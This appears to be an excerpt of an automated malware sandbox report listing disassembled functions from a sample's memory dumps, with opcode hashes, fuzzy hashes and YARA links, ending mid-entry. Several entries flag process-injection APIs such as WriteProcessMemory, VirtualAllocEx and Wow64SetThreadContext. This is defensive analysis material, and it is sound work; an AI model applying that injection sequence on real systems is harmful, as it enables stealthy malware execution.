                                                                                                                                                        Function 00CA073C, Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: !$#$$
                                                                                                                                                        • API String ID: 0-3795006478
                                                                                                                                                        • Opcode ID: c97de80163cac8b2c5408e59b33d0cad2fc7d9df16b3b0b240a863ca2cf38e53
                                                                                                                                                        • Instruction ID: 639978ef4882e188a46a2db8da7fc24b61f8a412494dc040fe2896a4e5c041f3
                                                                                                                                                        • Opcode Fuzzy Hash: c97de80163cac8b2c5408e59b33d0cad2fc7d9df16b3b0b240a863ca2cf38e53
                                                                                                                                                        • Instruction Fuzzy Hash: 6C51CD74C41229CFDB24DF64C948BDCBBB1AB0A309F2085EAD419A7250D7389AD4CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00351A48, Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: " 6$" 6
                                                                                                                                                        • API String ID: 0-2720310279
                                                                                                                                                        • Opcode ID: 5c556f893f3dbe9da16a7691febf50220bf0c0668fe8968518c5744d65b2b247
                                                                                                                                                        • Instruction ID: 0c7aa1011947d96fc206dbdcf7f377515758f146f5b5205abdf056ac0f035ecf
                                                                                                                                                        • Opcode Fuzzy Hash: 5c556f893f3dbe9da16a7691febf50220bf0c0668fe8968518c5744d65b2b247
                                                                                                                                                        • Instruction Fuzzy Hash: 56414874E102199FCB05DBE4D851AEEFBB2FF89300F104529E915A7394CB305D59CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00351A58, Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: " 6$" 6
                                                                                                                                                        • API String ID: 0-2720310279
                                                                                                                                                        • Opcode ID: 13a33d4e5ec46478635a9f9beb01dbcd010ef4207076345d887b9c323117b67f
                                                                                                                                                        • Instruction ID: 48e0cc3de8ea107bc372637818754c87a3e05b3adccba98d300f88ec8add4067
                                                                                                                                                        • Opcode Fuzzy Hash: 13a33d4e5ec46478635a9f9beb01dbcd010ef4207076345d887b9c323117b67f
                                                                                                                                                        • Instruction Fuzzy Hash: ED3125B4E102199FCB04DBE4D851AEFFBB2FB88300F108529E915A7354CB305D99CBA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0035CA68, Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: `!&m$`!&m
                                                                                                                                                        • API String ID: 0-1367616305
                                                                                                                                                        • Opcode ID: ab838e8335a254fff2461d4ce44ca3cd91b063ea02ed8779e817be8fa49f7769
                                                                                                                                                        • Instruction ID: 3e0b20ee80d68f3c4b0949240446d5e35f478896c9ad6ccc618d2856b6cb9737
                                                                                                                                                        • Opcode Fuzzy Hash: ab838e8335a254fff2461d4ce44ca3cd91b063ea02ed8779e817be8fa49f7769
                                                                                                                                                        • Instruction Fuzzy Hash: 97314970E1020DCFCB05DFA9D445AAEFBF6BF4830AF11956AD805A7260D7349985CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA081C, Relevance: 2.6, Strings: 2, Instructions: 74COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: $-
                                                                                                                                                        • API String ID: 0-1933255201
                                                                                                                                                        • Opcode ID: 7bce86456a1c529cc16de34d88d372e6ddb6e8ec27fd4f850987dde2a5139eb8
                                                                                                                                                        • Instruction ID: 71b00584be4b3eee1659b68332895ee79c43f834e19f41a30ae11b90fb22cfa9
                                                                                                                                                        • Opcode Fuzzy Hash: 7bce86456a1c529cc16de34d88d372e6ddb6e8ec27fd4f850987dde2a5139eb8
                                                                                                                                                        • Instruction Fuzzy Hash: 0131BC74D012298FDB60DF69D9887DDBBB2AF4A348F2080EAD409A7250D7349ED4CF45
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA011E, Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: '$\tc
                                                                                                                                                        • API String ID: 0-1625122724
                                                                                                                                                        • Opcode ID: 70223b0a1aca18848bbdbaf0f99e394420fa3d2ea4799af6619a29ea7e38d73c
                                                                                                                                                        • Instruction ID: 784a56f6e55afa969af4d852ce41c853d6c610d99d82c70d10dfb25008583dfe
                                                                                                                                                        • Opcode Fuzzy Hash: 70223b0a1aca18848bbdbaf0f99e394420fa3d2ea4799af6619a29ea7e38d73c
                                                                                                                                                        • Instruction Fuzzy Hash: 4C212674904228DFDB24CF64CC84BDDBBB5BB4A308F2080DAD609A7280D7709AC5DF94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 003506E0, Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: EB`i$i9lP
                                                                                                                                                        • API String ID: 0-1175396108
                                                                                                                                                        • Opcode ID: 336bb56af9c489c71d35217916dfb52b625c99865826da6beacdf6aa44e2aa8e
                                                                                                                                                        • Instruction ID: 54192c8ed4e4e209f36b6b5383117e4d979b30d4ef719d056a5311c375ae85d9
                                                                                                                                                        • Opcode Fuzzy Hash: 336bb56af9c489c71d35217916dfb52b625c99865826da6beacdf6aa44e2aa8e
                                                                                                                                                        • Instruction Fuzzy Hash: 44114C74E05208EFCB48DFA9D54059EBBB6FB88351F24C4BAC409E3324E735AA419F40
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0487DDB0, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0487DE83
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3559483778-0
                                                                                                                                                        • Opcode ID: 4f54fdc2712478c710c4bf155ce67586b1b93357327c912421b3d21d334976ed
                                                                                                                                                        • Instruction ID: 9c2e3f254db26a95f506920b088cc4ade22187ecc6381ae49fe59227c61594bb
                                                                                                                                                        • Opcode Fuzzy Hash: 4f54fdc2712478c710c4bf155ce67586b1b93357327c912421b3d21d334976ed
                                                                                                                                                        • Instruction Fuzzy Hash: AA4198B5D012589FCF00CFA9D984AEEBBF1BF49314F24942AE819B7200D774AA45CF64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0487DF38, Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0487DFEA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1726664587-0
                                                                                                                                                        • Opcode ID: 5d523a26a7f495b1f95edeacb110cabea3b52bbcd8ecfb060db9a8ff12999443
                                                                                                                                                        • Instruction ID: 4f5ab263c98d91775005950f0e6c368c7adcee60e2c990cf07c5be2b7cc33379
                                                                                                                                                        • Opcode Fuzzy Hash: 5d523a26a7f495b1f95edeacb110cabea3b52bbcd8ecfb060db9a8ff12999443
                                                                                                                                                        • Instruction Fuzzy Hash: E341A8B9D002589FCF00CFA9D884AEEFBB5BB49310F14942AE815B7200D735A945CF64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0487DC60, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0487DD0A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                        • Opcode ID: c124f5804321488f0960bacd95711a649cf218b5570d6ec16799141e5309c2a6
                                                                                                                                                        • Instruction ID: 480961c01c416ecbb50941c29d72235f093af3bc8db449a86576b5ff9111acd6
                                                                                                                                                        • Opcode Fuzzy Hash: c124f5804321488f0960bacd95711a649cf218b5570d6ec16799141e5309c2a6
                                                                                                                                                        • Instruction Fuzzy Hash: 0D3197B9D002589FCF00CFA9E884ADEFBB5BF49310F10A82AE815B7210D735A945CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0487DA78, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 0487DB27
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 983334009-0
                                                                                                                                                        • Opcode ID: 79f8c940bbb2a9f3f0a5f02cac5a8555e7262159281d282abae5805f5501646c
                                                                                                                                                        • Instruction ID: d59ff321ee8c518c6ae5e31381d1a34b31052c4dc6e5acaafb89d551895e0386
                                                                                                                                                        • Opcode Fuzzy Hash: 79f8c940bbb2a9f3f0a5f02cac5a8555e7262159281d282abae5805f5501646c
                                                                                                                                                        • Instruction Fuzzy Hash: AD31BBB5D012189FCB10CFAAD884AEEFBF5BF49314F14842AE419B7240D778A985CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0487D958, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ResumeThread.KERNELBASE(?), ref: 0487D9D6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2106634828.0000000004870000.00000040.00000001.sdmp, Offset: 04870000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                        • Opcode ID: c865c62ce495d42c036308881c1d6b220dbf0783274d7bf06a1e1d40663af2fc
                                                                                                                                                        • Instruction ID: f730699dca048d217176bfccaa5b508e7c3ed2f84ae939b13a7e5d5a834ba33a
                                                                                                                                                        • Opcode Fuzzy Hash: c865c62ce495d42c036308881c1d6b220dbf0783274d7bf06a1e1d40663af2fc
                                                                                                                                                        • Instruction Fuzzy Hash: 473198B8D012189FCB10CFA9E884ADEFBF5AF49314F14982AE815B7300D775A945CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA0A67, Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: (
                                                                                                                                                        • API String ID: 0-3887548279
                                                                                                                                                        • Opcode ID: 4b49576d18a9f94d25cd7b4835fdbd56e1c351c55aa90f3bddf3b777d0b1d903
                                                                                                                                                        • Instruction ID: e73469a3eed252deb814c30a0cb19bcc025aa6b6a375cca30af9c81b0722a4ac
                                                                                                                                                        • Opcode Fuzzy Hash: 4b49576d18a9f94d25cd7b4835fdbd56e1c351c55aa90f3bddf3b777d0b1d903
                                                                                                                                                        • Instruction Fuzzy Hash: 9051EEB0D412298FDB24DFA9C888BDDBBB1BB0A308F2085E9C509A7251D7749ED4CF54
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA0C7A, Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: -
                                                                                                                                                        • API String ID: 0-2547889144
                                                                                                                                                        • Opcode ID: 3a23557e82ffee4d7cc1856fceee6c3d4255f1022b909470701280b58362b965
                                                                                                                                                        • Instruction ID: bd32da1c4683f44c92fb1212d6473dab70a468fb1b7004ee3b3fa3c7f9c19d5c
                                                                                                                                                        • Opcode Fuzzy Hash: 3a23557e82ffee4d7cc1856fceee6c3d4255f1022b909470701280b58362b965
                                                                                                                                                        • Instruction Fuzzy Hash: 2E31BC74D042298FDB64DF69C8887DCBBB1AF0A348F5484E9D049A7250DB349ED8CF45
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA0892, Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: &
                                                                                                                                                        • API String ID: 0-1010288
                                                                                                                                                        • Opcode ID: 2d191e98c7f88d73615c85a666b844abcc1b2e0a679d08c0b65a3324610098b4
                                                                                                                                                        • Instruction ID: 52f4856697133a0880aed6d0c4b26a00155ffec2a1a4943d93c5342cc6772f52
                                                                                                                                                        • Opcode Fuzzy Hash: 2d191e98c7f88d73615c85a666b844abcc1b2e0a679d08c0b65a3324610098b4
                                                                                                                                                        • Instruction Fuzzy Hash: 8221FC79904228CFCB20CF60C988BECBBB1BB0A319F2085E9D409A7290D3359BC4CF50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 003530C0, Relevance: 1.3, Strings: 1, Instructions: 33COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: E5
                                                                                                                                                        • API String ID: 0-1066200063
                                                                                                                                                        • Opcode ID: c528faa70a9e1f490fcca911f0985cc51f20ed5c66e9ff1d9db79234eec31a03
                                                                                                                                                        • Instruction ID: 5373710d382608838206655e75d5005822f4e41162d0bb5be6b80918c7ba5c78
                                                                                                                                                        • Opcode Fuzzy Hash: c528faa70a9e1f490fcca911f0985cc51f20ed5c66e9ff1d9db79234eec31a03
                                                                                                                                                        • Instruction Fuzzy Hash: 9EF09674E00348DFD702EBB8E809B7DBBEA9B05396F1144B9C80E93561E7308A88C711
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA02AB, Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: ,
                                                                                                                                                        • API String ID: 0-3772416878
                                                                                                                                                        • Opcode ID: 37b0374db73f76f8df205d4dd09b676da089c555bad7c2e27de050f6c1499c18
                                                                                                                                                        • Instruction ID: f225a58cc6c39499e0003985afe336824417dc67af2be6fe999f1c1fe5408721
                                                                                                                                                        • Opcode Fuzzy Hash: 37b0374db73f76f8df205d4dd09b676da089c555bad7c2e27de050f6c1499c18
                                                                                                                                                        • Instruction Fuzzy Hash: ACF0F93590411EDFDF24CF65C944BDCBBB1AB0A348F2080D9D449A3251C3359AE5EF55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00CA0839, Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2105340448.0000000000CA0000.00000040.00000001.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: .
                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                        • Opcode ID: 863145540e6d1bbf8c163de5ccf097aa8dd60b873ec31a44c4639e208d0402b2
                                                                                                                                                        • Instruction ID: 3d134fbcd1a48a972eaa6441987b83e32b64b919b42c4a3b7d40a8ec0ff8164b
                                                                                                                                                        • Opcode Fuzzy Hash: 863145540e6d1bbf8c163de5ccf097aa8dd60b873ec31a44c4639e208d0402b2
                                                                                                                                                        • Instruction Fuzzy Hash: 31F0A570C45168CFEBA0CF68C884BDCB7F1BB1A359F6444D5E009A3240C7799AE48F55
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00355C78, Relevance: .3, Instructions: 314COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 1d448f86a2389bbe712fe3db0759e9e7d64c96e821d909c92cf4adaefa610020
                                                                                                                                                        • Instruction ID: e71c560ccf55a2ab624bc5d6796a3be3ad17ffb5d2281d71e414e2e44093c6b6
                                                                                                                                                        • Opcode Fuzzy Hash: 1d448f86a2389bbe712fe3db0759e9e7d64c96e821d909c92cf4adaefa610020
                                                                                                                                                        • Instruction Fuzzy Hash: F9915C3080A3848FDB16DFB8D8559D87BB5EF06306F5984ABC4459B272D7348A88DF62
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00356362, Relevance: .2, Instructions: 200COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8e091b48871c12871f1f4747e07735b573426cd4929c4056bc29e9f2a5a8e017
                                                                                                                                                        • Instruction ID: 0e2163f2d63bbc0808c3b05fddd8b40e983960f6bdd621ddfef9bd9c6d2c12f8
                                                                                                                                                        • Opcode Fuzzy Hash: 8e091b48871c12871f1f4747e07735b573426cd4929c4056bc29e9f2a5a8e017
                                                                                                                                                        • Instruction Fuzzy Hash: 84A15A70901218CFDB64DFA4D849AACBBF2FF08305F5495A9D80AA7364DB305E84CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00355FFD, Relevance: .2, Instructions: 196COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 183f4b2a31f264c08b99be045cadd364a4aa1e903f784dc926049acce6237d77
                                                                                                                                                        • Instruction ID: ba2cc8cf2d1986a454787e4098307262b83f2346a5349b076e42ef7fe2b56206
                                                                                                                                                        • Opcode Fuzzy Hash: 183f4b2a31f264c08b99be045cadd364a4aa1e903f784dc926049acce6237d77
                                                                                                                                                        • Instruction Fuzzy Hash: 3DA13970901308CFDB64DFA4D849AADBBF2FB08305F5495A9D84A97364DB345E84CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 003564C2, Relevance: .2, Instructions: 163COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0bc51804318b322bc0b597204b7153388e2058743fb217d6149cc93eec9f059a
                                                                                                                                                        • Instruction ID: 7af224a1f1422447b6fa4402daf7bf5a75a6aebee3a06b61083325a68479aa0f
                                                                                                                                                        • Opcode Fuzzy Hash: 0bc51804318b322bc0b597204b7153388e2058743fb217d6149cc93eec9f059a
                                                                                                                                                        • Instruction Fuzzy Hash: F4816B70900308CFDB24DFA4E849AACBBF6FB08305F5494A9D8469B364DB349D84CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00355E22, Relevance: .2, Instructions: 155COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ed53163bbf37a9b815f657fcd2c77bcbbd92c81d569a7b1eacb5ea2939079ba8
                                                                                                                                                        • Instruction ID: 79d8a3a21aa7f44f275cf6bf4df5190f6e74dad32696ebc5bc671ff17549ef70
                                                                                                                                                        • Opcode Fuzzy Hash: ed53163bbf37a9b815f657fcd2c77bcbbd92c81d569a7b1eacb5ea2939079ba8
                                                                                                                                                        • Instruction Fuzzy Hash: 4F716D70901208CFDB25DFA4E949EACBBF5FB08305F5494A9D84A9B364DB349D84CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00355DE8, Relevance: .2, Instructions: 150COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d0722206bcd1ca0c225b5241e847c0cbd23bbb02fe2aafdd7b78c51a207c4cf3
                                                                                                                                                        • Instruction ID: ee0fd8ecd3d2bde5cd0e8897427d60d7512845f57c6f344b227ec859b1f9da69
                                                                                                                                                        • Opcode Fuzzy Hash: d0722206bcd1ca0c225b5241e847c0cbd23bbb02fe2aafdd7b78c51a207c4cf3
                                                                                                                                                        • Instruction Fuzzy Hash: 35619D70901208CFDB25DFA4E849EACBBF5FB09306F549469D8069B375DB349988CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00355F55, Relevance: .2, Instructions: 150COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 9509b5fb39a7363ee504d2e10b7abce05bb7f3df7cba96c0db16a827b2960f8a
                                                                                                                                                        • Instruction ID: a165221cf70fe2b77a3ad31477c8625f09da30aa175441194b455ca389f5dc30
                                                                                                                                                        • Opcode Fuzzy Hash: 9509b5fb39a7363ee504d2e10b7abce05bb7f3df7cba96c0db16a827b2960f8a
                                                                                                                                                        • Instruction Fuzzy Hash: 0A718D70901208CFDB29DFA8E949E9CBBF1FB08305F58D469D8169B365DB309984CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00356173, Relevance: .1, Instructions: 146COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0215ada254c147f5a48663a0cc3f443e700a4975c8563c237e517d014617eaea
                                                                                                                                                        • Instruction ID: 58e52966489651e3fed5a537a0ed03c5776ce7f88622f50321cb9f56b3c79950
                                                                                                                                                        • Opcode Fuzzy Hash: 0215ada254c147f5a48663a0cc3f443e700a4975c8563c237e517d014617eaea
                                                                                                                                                        • Instruction Fuzzy Hash: EB618F70901208CFD729DFA4E949E9CBBF5FB08305F58D469D8469B265DB309D84CFA1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00355ECC, Relevance: .1, Instructions: 146COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c6169315f4cb313820870bba7949f3fbe3d130e979f9ff74813a139b78eb7129
                                                                                                                                                        • Instruction ID: 09ebbf2a1be8f99c54538be53af7596c32a4457d8eb7b4630e4c92ef18b758c8
                                                                                                                                                        • Opcode Fuzzy Hash: c6169315f4cb313820870bba7949f3fbe3d130e979f9ff74813a139b78eb7129
                                                                                                                                                        • Instruction Fuzzy Hash: 1B617D70901208CFDB25DFA4E949EACBBF2FB08305F5494A9D84A97365DB309D84CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00356637, Relevance: .1, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.2104863989.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: c67995ccff06ef1d17d67cc07246315cd520ab55840b05b423413f3f3177d913
